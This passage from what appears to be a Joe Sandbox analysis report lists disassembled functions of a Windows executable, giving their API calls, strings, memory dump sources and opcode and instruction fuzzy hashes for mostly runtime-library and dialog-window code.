                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                          • Instruction ID: 197b39b36e6599142d7a57dd38add7e63e3d25aaf1b315783ad6a2fdd8e6a962
                                                                          • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                          • Instruction Fuzzy Hash: A98166B17043424BDB24DE68CCD0BFD77D5ABE1318F04492DE9868B2C2DA74A9C6B752
                                                                          Function 00F251C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9d03c732521989592e923609e8452ee3bcf579a4031a887902f1f28a27d5244
                                                                          • Instruction ID: 51cf87834df7cdefe13729bec922952fdbd1fa7b1b01083ee3e7c94baae44780
                                                                          • Opcode Fuzzy Hash: b9d03c732521989592e923609e8452ee3bcf579a4031a887902f1f28a27d5244
                                                                          • Instruction Fuzzy Hash: 90615132E00F38A6DA389A687C957BE3395EB41F60F14151AE882DF2C1D2B5EC42B611
                                                                          Function 00F24F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                          • Instruction ID: be00b0f74fafa8fe6c7937adda048316cb304eccaa4f622ff9f21159c501d098
                                                                          • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                          • Instruction Fuzzy Hash: 03514661A04E7657DF34C568BD56BBF2385AB81F20F180819E982CB282C679ED05B396
                                                                          Function 00F0EFE2 Relevance: .2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71d006d3a063a371cf9949edac6d648658573b40291d7af958705226e4fb97de
                                                                          • Instruction ID: e6a50f0ed44c5ee9f32617486f0d7cb22225129562e6556b5cfbb594149c9821
                                                                          • Opcode Fuzzy Hash: 71d006d3a063a371cf9949edac6d648658573b40291d7af958705226e4fb97de
                                                                          • Instruction Fuzzy Hash: B751C8715083D58EC721CF24C5804AEBFE0AF96724F4909ADE4D95B683D231DA4EFB62
                                                                          Function 00F100B7 Relevance: .1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f33f5043449157330ab25d23ab964166de0c8d6d22057ae50d418b41abc3701c
                                                                          • Instruction ID: 5aaa737879ed2967ce75991d6d07412f79948970eb77e44b48043bc9a98b2bfe
                                                                          • Opcode Fuzzy Hash: f33f5043449157330ab25d23ab964166de0c8d6d22057ae50d418b41abc3701c
                                                                          • Instruction Fuzzy Hash: AB51DFB1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E3340DB34E999CB96
                                                                          Function 00F13E0B Relevance: .1, Instructions: 112COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                          • Instruction ID: 79a3c1a16083c3b4f741f65ab13bcd687fa6b7b9d6f2bbf86074a2a829dfed5f
                                                                          • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                          • Instruction Fuzzy Hash: 2F3118B1A147468FCB18DF28CC512AEBBE0FB95314F14852DE495D7341C738EA4ADB91
                                                                          Function 00F0E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00F0E30E
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                            • Part of subcall function 00F11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F41030,00000200,00F0D928,00000000,?,00000050,00F41030), ref: 00F11DC4
                                                                          • _strlen.LIBCMT ref: 00F0E32F
                                                                          • SetDlgItemTextW.USER32(?,00F3E274,?), ref: 00F0E38F
                                                                          • GetWindowRect.USER32(?,?), ref: 00F0E3C9
                                                                          • GetClientRect.USER32(?,?), ref: 00F0E3D5
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00F0E475
                                                                          • GetWindowRect.USER32(?,?), ref: 00F0E4A2
                                                                          • SetWindowTextW.USER32(?,?), ref: 00F0E4DB
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00F0E4E3
                                                                          • GetWindow.USER32(?,00000005), ref: 00F0E4EE
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00F0E51B
                                                                          • GetWindow.USER32(00000000,00000002), ref: 00F0E58D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                          • String ID: $%s:$CAPTION$d
                                                                          • API String ID: 2407758923-2512411981
                                                                          • Opcode ID: 7a0580ebf52f120a3f419551c27ecf46c870986cb5f7fa7abb4e86b59e00d461
                                                                          • Instruction ID: 90f3672a359e0f3bfbfb18d7d937f3f99c93afb8eb95f2ab420088333fc2d21a
                                                                          • Opcode Fuzzy Hash: 7a0580ebf52f120a3f419551c27ecf46c870986cb5f7fa7abb4e86b59e00d461
                                                                          • Instruction Fuzzy Hash: FC81C271608305AFD710DFA8CC88A6FBBE9EFC9714F04091DFA94D3291D674E905AB52
                                                                          Function 00F2CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___free_lconv_mon.LIBCMT ref: 00F2CB66
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C71E
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C730
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C742
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C754
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C766
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C778
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C78A
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C79C
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7AE
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7C0
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7D2
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7E4
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7F6
                                                                          • _free.LIBCMT ref: 00F2CB5B
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F2CB7D
                                                                          • _free.LIBCMT ref: 00F2CB92
                                                                          • _free.LIBCMT ref: 00F2CB9D
                                                                          • _free.LIBCMT ref: 00F2CBBF
                                                                          • _free.LIBCMT ref: 00F2CBD2
                                                                          • _free.LIBCMT ref: 00F2CBE0
                                                                          • _free.LIBCMT ref: 00F2CBEB
                                                                          • _free.LIBCMT ref: 00F2CC23
                                                                          • _free.LIBCMT ref: 00F2CC2A
                                                                          • _free.LIBCMT ref: 00F2CC47
                                                                          • _free.LIBCMT ref: 00F2CC5F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                          • String ID:
                                                                          • API String ID: 161543041-0
                                                                          • Opcode ID: ccc816b1270713d50a3a2bb78b823ca5c6fb55c89a2d80c4c2993e8a01ba2231
                                                                          • Instruction ID: b9c0e2aa097345a26a507d9dc4b83c2e0a139eee91418093380a538d8441d72c
                                                                          • Opcode Fuzzy Hash: ccc816b1270713d50a3a2bb78b823ca5c6fb55c89a2d80c4c2993e8a01ba2231
                                                                          • Instruction Fuzzy Hash: B1315031A013259FEB20AA39FC46B5A77E9EF50360F504819E548D71A2DF39EC46EB90
                                                                          Function 00F19711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00F19736
                                                                          • _wcslen.LIBCMT ref: 00F197D6
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00F197E5
                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F19806
                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F1982D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                          • API String ID: 1777411235-4209811716
                                                                          • Opcode ID: 2fbe4c7df994777caa48b8252d4658687284980c893d389800f380a50f0489f6
                                                                          • Instruction ID: 4e4fc07b1919736e63a3896d1b4a5d97ee7ae6cf2775202823ba991d303b4d87
                                                                          • Opcode Fuzzy Hash: 2fbe4c7df994777caa48b8252d4658687284980c893d389800f380a50f0489f6
                                                                          • Instruction Fuzzy Hash: B2312E3290C7117AE725AF249C06F9FBB989F42730F14011DF501961D1EBA8E949A3E6
                                                                          Function 00F1D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindow.USER32(?,00000005), ref: 00F1D6C1
                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 00F1D6ED
                                                                            • Part of subcall function 00F11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F0C116,00000000,.exe,?,?,00000800,?,?,?,00F18E3C), ref: 00F11FD1
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F1D709
                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F1D720
                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00F1D734
                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F1D75D
                                                                          • DeleteObject.GDI32(00000000), ref: 00F1D764
                                                                          • GetWindow.USER32(00000000,00000002), ref: 00F1D76D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                          • String ID: STATIC
                                                                          • API String ID: 3820355801-1882779555
                                                                          • Opcode ID: 03b28a16175747d88dec6b67ec86fcb31bbf388588c5928fb5d21bb5aaf64159
                                                                          • Instruction ID: 3870d6bfb6f6c1c5a85ba94419f732bb7ea7aefe4e98af17613db1778000079a
                                                                          • Opcode Fuzzy Hash: 03b28a16175747d88dec6b67ec86fcb31bbf388588c5928fb5d21bb5aaf64159
                                                                          • Instruction Fuzzy Hash: D81106729053147BE6216B709C4AFEF7A6CAF44721F004120FA61A20D1DAB8CE89B6B5
                                                                          Function 00F296F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00F29705
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F29711
                                                                          • _free.LIBCMT ref: 00F2971C
                                                                          • _free.LIBCMT ref: 00F29727
                                                                          • _free.LIBCMT ref: 00F29732
                                                                          • _free.LIBCMT ref: 00F2973D
                                                                          • _free.LIBCMT ref: 00F29748
                                                                          • _free.LIBCMT ref: 00F29753
                                                                          • _free.LIBCMT ref: 00F2975E
                                                                          • _free.LIBCMT ref: 00F2976C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: ee7cbb7d57baf4d35d420e56bc98e1c4912f93ec3ad40d5fefb39719d3e59a11
                                                                          • Instruction ID: d3f85a948bd6e1e8bf6d35177f46d5efffc7dd321a1a604afbf06f9b7c3bf434
                                                                          • Opcode Fuzzy Hash: ee7cbb7d57baf4d35d420e56bc98e1c4912f93ec3ad40d5fefb39719d3e59a11
                                                                          • Instruction Fuzzy Hash: 0111D476512019BFDB01EF54EC42CD93BB5EF14390B9158A0FA088F272DE36DA56AB84
                                                                          Function 00F22E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 322700389-393685449
                                                                          • Opcode ID: 8769ccc2a840ea99523bf56cc9bfff4d316d17d9f3ed7a0b6fdd9efafec982d7
                                                                          • Instruction ID: c272a06fb76da40351575c080668cd80bdb9bb9a7ba68eace5540494dfa776ff
                                                                          • Opcode Fuzzy Hash: 8769ccc2a840ea99523bf56cc9bfff4d316d17d9f3ed7a0b6fdd9efafec982d7
                                                                          • Instruction Fuzzy Hash: 27B16CB1D00229EFCF25DFA4E9819AEBBB5FF04320F144159E8016B216D739DA61EF91
                                                                          Function 00F06FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F06FAA
                                                                          • _wcslen.LIBCMT ref: 00F07013
                                                                          • _wcslen.LIBCMT ref: 00F07084
                                                                            • Part of subcall function 00F07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07AAB
                                                                            • Part of subcall function 00F07A9C: GetLastError.KERNEL32 ref: 00F07AF1
                                                                            • Part of subcall function 00F07A9C: CloseHandle.KERNEL32(?), ref: 00F07B00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                          • API String ID: 3122303884-3508440684
                                                                          • Opcode ID: 2dd1807089d33b675ffb4b2267f9eba337a47b6bd5fa4206ec7d3870844c4bdb
                                                                          • Instruction ID: 23cbd276e0f7bd9b9f333dd0687f8e6c6047c50af748b4d3fb7d9919b6e5d64f
                                                                          • Opcode Fuzzy Hash: 2dd1807089d33b675ffb4b2267f9eba337a47b6bd5fa4206ec7d3870844c4bdb
                                                                          • Instruction Fuzzy Hash: FB41E4B1D08744AAEF20F7749C82FEE776C9F04324F004595FA45A61C2D778BA88B761
                                                                          Function 00F1B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1B610
                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F1B637
                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F1B650
                                                                          • SetWindowTextW.USER32(?,?), ref: 00F1B661
                                                                          • GetDlgItem.USER32(?,00000065), ref: 00F1B66A
                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F1B67E
                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F1B694
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
